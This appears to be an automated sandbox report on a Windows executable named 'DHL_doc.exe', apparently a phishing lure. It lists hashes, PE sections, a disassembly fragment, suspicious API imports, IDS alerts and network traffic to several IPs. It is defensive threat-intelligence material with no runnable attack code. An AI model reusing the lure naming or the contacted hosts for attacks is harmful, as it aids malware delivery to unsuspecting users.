Preview:	.j...0Q8D...C.....DT..q3Y..W0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DD.0JDW/.6D.^.k.X\|...,>Cj4+_6J%)wS+7_%.&!wB?yY?.....'+=U.5INs0JDY0Q8=E^.w$>.lX#.jP-.C...~$0.P...mX#.M..eP6..-4Xw$>.Q8DDW0JD.uQ8.EV0/..QQ8DDW0JD.0S9OE\0J.]0Q8DDW0JD.#Q8DTW0J$]0Q8.DW JDY2Q8BDW0JDY0W8DDW0JDYPU8DFW0JDY0S8..W0ZDY Q8DDG0JTY0Q8DDG0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0d0<H%8DDS.NDY Q8D.S0JTY0Q8DDW0JDY0Q8dDWPJDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DDW0JDY0Q8DD

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.364217675561193
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DHL_doc.exe
File size:	1'715'200 bytes
MD5:	5fccc46e9f84dcbf89e7a5f6e316d48e
SHA1:	d8bcff20a113d39ce73d063060e458a7cc6a815d
SHA256:	09b4294185e7c2cf4ef94bf7b2a47ec7ce7187e0dcca67498443019ef53bcd02
SHA512:	d8a64837829f4334bb7e2c1d597aa8e97502425db88c9eaff4bf3e4c9ec604620737fb5606a21d8772e329c9a89664c5487162f39c28a352edd905259d6b3450
SSDEEP:	49152:bTvC/MTQYxsWR7a8k6/c/1q5PVj2Sv9Yu20Pr:PjTQYxsWRwec/1UPVhvKF0j
TLSH:	BF85D00373918062FFAB93734F5AE611467E7E2A0533E51F13A83979BB711A1123E663
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	1911343483a32c0c

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x672C1A83 [Thu Nov 7 01:40:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F6B493AA743h
jmp 00007F6B493AA04Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F6B493AA22Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F6B493AA1FAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F6B493ACDEDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F6B493ACE38h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F6B493ACE21h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0xcc148	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1a1000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0xcc148	0xcc200	bcf6c0afe5bad978c0314d5801f7dd49	False	0.8872904546846295	data	7.763116729703133	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1a1000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd4548	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd4670	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd4798	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd48c0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 5905 x 5905 px/m	English	Great Britain	0.42021276595744683
RT_ICON	0xd4d28	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 5905 x 5905 px/m	English	Great Britain	0.28236397748592873
RT_ICON	0xd5dd0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 5905 x 5905 px/m	English	Great Britain	0.21192946058091286
RT_ICON	0xd8378	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 5905 x 5905 px/m	English	Great Britain	0.18711620217288616
RT_ICON	0xdc5a0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 5905 x 5905 px/m	English	Great Britain	0.12822370755944634
RT_ICON	0xecdc8	0x8ef0	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	Great Britain	0.9361062527328378
RT_MENU	0xf5cb8	0x50	data	English	Great Britain	0.9
RT_STRING	0xf5d08	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xf629c	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xf6928	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xf6db8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xf73b4	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xf7a10	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xf7e78	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xf7fd0	0xa7c14	data			1.0003143537411006
RT_GROUP_ICON	0x19fbe4	0x5a	data	English	Great Britain	0.7888888888888889
RT_GROUP_ICON	0x19fc40	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x19fc54	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x19fc68	0x14	data	English	Great Britain	1.25
RT_VERSION	0x19fc7c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x19fd58	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-07T08:08:57.650987+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.4	49730	TCP
2024-11-07T08:09:36.336417+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.4	49738	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 7, 2024 08:09:21.255518913 CET	49736	80	192.168.2.4	194.58.112.174
Nov 7, 2024 08:09:21.260507107 CET	80	49736	194.58.112.174	192.168.2.4
Nov 7, 2024 08:09:21.260569096 CET	49736	80	192.168.2.4	194.58.112.174
Nov 7, 2024 08:09:21.268678904 CET	49736	80	192.168.2.4	194.58.112.174
Nov 7, 2024 08:09:21.273696899 CET	80	49736	194.58.112.174	192.168.2.4
Nov 7, 2024 08:09:22.154660940 CET	80	49736	194.58.112.174	192.168.2.4
Nov 7, 2024 08:09:22.154808044 CET	80	49736	194.58.112.174	192.168.2.4
Nov 7, 2024 08:09:22.154876947 CET	49736	80	192.168.2.4	194.58.112.174
Nov 7, 2024 08:09:22.154966116 CET	80	49736	194.58.112.174	192.168.2.4
Nov 7, 2024 08:09:22.155575991 CET	80	49736	194.58.112.174	192.168.2.4
Nov 7, 2024 08:09:22.155586004 CET	80	49736	194.58.112.174	192.168.2.4
Nov 7, 2024 08:09:22.155626059 CET	49736	80	192.168.2.4	194.58.112.174
Nov 7, 2024 08:09:22.156255007 CET	80	49736	194.58.112.174	192.168.2.4
Nov 7, 2024 08:09:22.156265020 CET	80	49736	194.58.112.174	192.168.2.4
Nov 7, 2024 08:09:22.156275988 CET	80	49736	194.58.112.174	192.168.2.4
Nov 7, 2024 08:09:22.156296015 CET	49736	80	192.168.2.4	194.58.112.174
Nov 7, 2024 08:09:22.156322956 CET	49736	80	192.168.2.4	194.58.112.174
Nov 7, 2024 08:09:22.156424999 CET	80	49736	194.58.112.174	192.168.2.4
Nov 7, 2024 08:09:22.156435966 CET	80	49736	194.58.112.174	192.168.2.4
Nov 7, 2024 08:09:22.156483889 CET	49736	80	192.168.2.4	194.58.112.174
Nov 7, 2024 08:09:22.159946918 CET	80	49736	194.58.112.174	192.168.2.4
Nov 7, 2024 08:09:22.205235004 CET	49736	80	192.168.2.4	194.58.112.174
Nov 7, 2024 08:09:22.303554058 CET	80	49736	194.58.112.174	192.168.2.4
Nov 7, 2024 08:09:22.303725958 CET	49736	80	192.168.2.4	194.58.112.174
Nov 7, 2024 08:09:22.305347919 CET	49736	80	192.168.2.4	194.58.112.174
Nov 7, 2024 08:09:22.310141087 CET	80	49736	194.58.112.174	192.168.2.4
Nov 7, 2024 08:09:37.453021049 CET	49749	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:37.457916021 CET	80	49749	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:37.457986116 CET	49749	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:37.468889952 CET	49749	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:37.473697901 CET	80	49749	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:38.091495991 CET	80	49749	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:38.091515064 CET	80	49749	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:38.091603041 CET	49749	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:38.092082977 CET	80	49749	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:38.092128038 CET	49749	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:38.971057892 CET	49749	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:39.989974976 CET	49765	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:39.994910955 CET	80	49765	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:39.995040894 CET	49765	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:40.009017944 CET	49765	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:40.014043093 CET	80	49765	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:40.653666019 CET	80	49765	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:40.653698921 CET	80	49765	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:40.653762102 CET	49765	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:40.685332060 CET	80	49765	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:40.685436010 CET	49765	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:41.517793894 CET	49765	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:42.536833048 CET	49781	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:42.541723013 CET	80	49781	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:42.541847944 CET	49781	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:42.552428007 CET	49781	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:42.557315111 CET	80	49781	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:42.557329893 CET	80	49781	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:42.557394981 CET	80	49781	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:42.557411909 CET	80	49781	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:42.557514906 CET	80	49781	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:42.557528019 CET	80	49781	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:42.557554960 CET	80	49781	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:42.557569027 CET	80	49781	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:42.557583094 CET	80	49781	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:43.206068039 CET	80	49781	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:43.206084967 CET	80	49781	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:43.206146002 CET	49781	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:43.206859112 CET	80	49781	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:43.206907988 CET	49781	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:44.064599037 CET	49781	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:45.083606005 CET	49795	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:45.088541985 CET	80	49795	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:45.088630915 CET	49795	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:45.095477104 CET	49795	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:45.100258112 CET	80	49795	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:45.717549086 CET	80	49795	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:45.717580080 CET	80	49795	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:45.717705965 CET	49795	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:45.718101978 CET	80	49795	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:45.718144894 CET	49795	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:45.720415115 CET	49795	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:09:45.725191116 CET	80	49795	199.59.243.227	192.168.2.4
Nov 7, 2024 08:09:50.905180931 CET	49826	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:50.910031080 CET	80	49826	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:50.910094023 CET	49826	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:50.920037031 CET	49826	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:50.924787045 CET	80	49826	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:52.424017906 CET	49826	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:52.429367065 CET	80	49826	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:52.429430008 CET	49826	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:53.443193913 CET	49842	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:53.447968960 CET	80	49842	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:53.448077917 CET	49842	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:53.458730936 CET	49842	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:53.463510036 CET	80	49842	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:54.074779034 CET	80	49842	3.33.130.190	192.168.2.4
